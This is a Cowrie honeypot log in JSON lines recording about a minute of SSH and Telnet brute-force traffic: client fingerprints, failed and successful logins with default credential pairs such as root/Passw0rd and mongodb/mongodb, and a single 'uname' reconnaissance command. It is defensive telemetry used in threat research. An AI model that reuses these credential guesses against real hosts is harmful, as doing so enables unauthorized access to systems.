{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:52.264918Z","src_ip":"212.227.235.229","session":"79faad96282e"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T07:01:53.047117Z","src_ip":"212.227.235.229","session":"79faad96282e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:54.310279Z","src_ip":"212.227.235.229","session":"79faad96282e"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":55800,"dst_ip":"1.2.3.4","dst_port":23,"session":"f77f1e73d448","protocol":"telnet","message":"New connection: 3.130.96.91:55800 (1.2.3.4:23) [session: f77f1e73d448]","sensor":"my-vps","timestamp":"2025-08-28T07:01:57.019835Z"}
{"eventid":"cowrie.session.closed","duration":0.15240979194641113,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:57.172170Z","src_ip":"3.130.96.91","session":"f77f1e73d448"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53790,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a3393954faf","protocol":"ssh","message":"New connection: 212.227.125.160:53790 (1.2.3.4:22) [session: 4a3393954faf]","sensor":"my-vps","timestamp":"2025-08-28T07:02:01.893611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:01.895246Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:02.113327Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:02:03.022208Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:02:03.652844Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:02:03.653592Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:03.874722Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:03.875915Z","src_ip":"212.227.125.160","session":"4a3393954faf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1993f066140","protocol":"ssh","message":"New connection: 212.227.235.229:58948 (1.2.3.4:22) [session: b1993f066140]","sensor":"my-vps","timestamp":"2025-08-28T07:02:08.701801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:08.702656Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:08.952178Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:02:09.703097Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:02:10.298602Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:02:10.299387Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:10.550704Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:10.552164Z","src_ip":"212.227.235.229","session":"b1993f066140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44068,"dst_ip":"1.2.3.4","dst_port":22,"session":"db48c3153b72","protocol":"ssh","message":"New connection: 212.227.125.160:44068 (1.2.3.4:22) [session: db48c3153b72]","sensor":"my-vps","timestamp":"2025-08-28T07:02:18.588306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:18.589512Z","src_ip":"212.227.125.160","session":"db48c3153b72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:18.808297Z","src_ip":"212.227.125.160","session":"db48c3153b72"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:19.462057Z","src_ip":"212.227.125.160","session":"db48c3153b72"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:20.680099Z","src_ip":"212.227.125.160","session":"db48c3153b72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37954,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c6763b839f4","protocol":"ssh","message":"New connection: 212.227.235.229:37954 (1.2.3.4:22) [session: 4c6763b839f4]","sensor":"my-vps","timestamp":"2025-08-28T07:02:25.239669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:25.240542Z","src_ip":"212.227.235.229","session":"4c6763b839f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:25.496410Z","src_ip":"212.227.235.229","session":"4c6763b839f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15488,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ebbc6500a47","protocol":"ssh","message":"New connection: 212.227.125.160:15488 (1.2.3.4:22) [session: 3ebbc6500a47]","sensor":"my-vps","timestamp":"2025-08-28T07:02:26.215650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:02:26.216291Z","src_ip":"212.227.125.160","session":"3ebbc6500a47"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:26.265059Z","src_ip":"212.227.235.229","session":"4c6763b839f4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:02:26.297691Z","src_ip":"212.227.125.160","session":"3ebbc6500a47"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:26.702392Z","src_ip":"212.227.125.160","session":"3ebbc6500a47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:27.521743Z","src_ip":"212.227.235.229","session":"4c6763b839f4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:27.784404Z","src_ip":"212.227.125.160","session":"3ebbc6500a47"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":35188,"dst_ip":"1.2.3.4","dst_port":23,"session":"eba3daac7fdb","protocol":"telnet","message":"New connection: 3.130.96.91:35188 (1.2.3.4:23) [session: eba3daac7fdb]","sensor":"my-vps","timestamp":"2025-08-28T07:02:29.301805Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40370,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a335941bc4d","protocol":"ssh","message":"New connection: 212.227.125.160:40370 (1.2.3.4:22) [session: 9a335941bc4d]","sensor":"my-vps","timestamp":"2025-08-28T07:02:34.970423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:34.971333Z","src_ip":"212.227.125.160","session":"9a335941bc4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:35.189833Z","src_ip":"212.227.125.160","session":"9a335941bc4d"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:35.848090Z","src_ip":"212.227.125.160","session":"9a335941bc4d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:37.069264Z","src_ip":"212.227.125.160","session":"9a335941bc4d"}
{"eventid":"cowrie.session.closed","duration":10.015711784362793,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:39.317447Z","src_ip":"3.130.96.91","session":"eba3daac7fdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54586,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef3ad5259bb8","protocol":"ssh","message":"New connection: 212.227.235.229:54586 (1.2.3.4:22) [session: ef3ad5259bb8]","sensor":"my-vps","timestamp":"2025-08-28T07:02:41.600345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:41.602141Z","src_ip":"212.227.235.229","session":"ef3ad5259bb8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:41.854115Z","src_ip":"212.227.235.229","session":"ef3ad5259bb8"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:42.612635Z","src_ip":"212.227.235.229","session":"ef3ad5259bb8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:43.867775Z","src_ip":"212.227.235.229","session":"ef3ad5259bb8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59448,"dst_ip":"1.2.3.4","dst_port":22,"session":"55d82e724228","protocol":"ssh","message":"New connection: 217.72.205.35:59448 (1.2.3.4:22) [session: 55d82e724228]","sensor":"my-vps","timestamp":"2025-08-28T07:02:45.713421Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:45.714437Z","src_ip":"217.72.205.35","session":"55d82e724228"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39682,"dst_ip":"1.2.3.4","dst_port":22,"session":"298f4b27c7db","protocol":"ssh","message":"New connection: 212.227.125.160:39682 (1.2.3.4:22) [session: 298f4b27c7db]","sensor":"my-vps","timestamp":"2025-08-28T07:02:51.387441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:51.388216Z","src_ip":"212.227.125.160","session":"298f4b27c7db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:51.606942Z","src_ip":"212.227.125.160","session":"298f4b27c7db"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:52.263863Z","src_ip":"212.227.125.160","session":"298f4b27c7db"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:02:53.489467Z","src_ip":"212.227.125.160","session":"298f4b27c7db"}
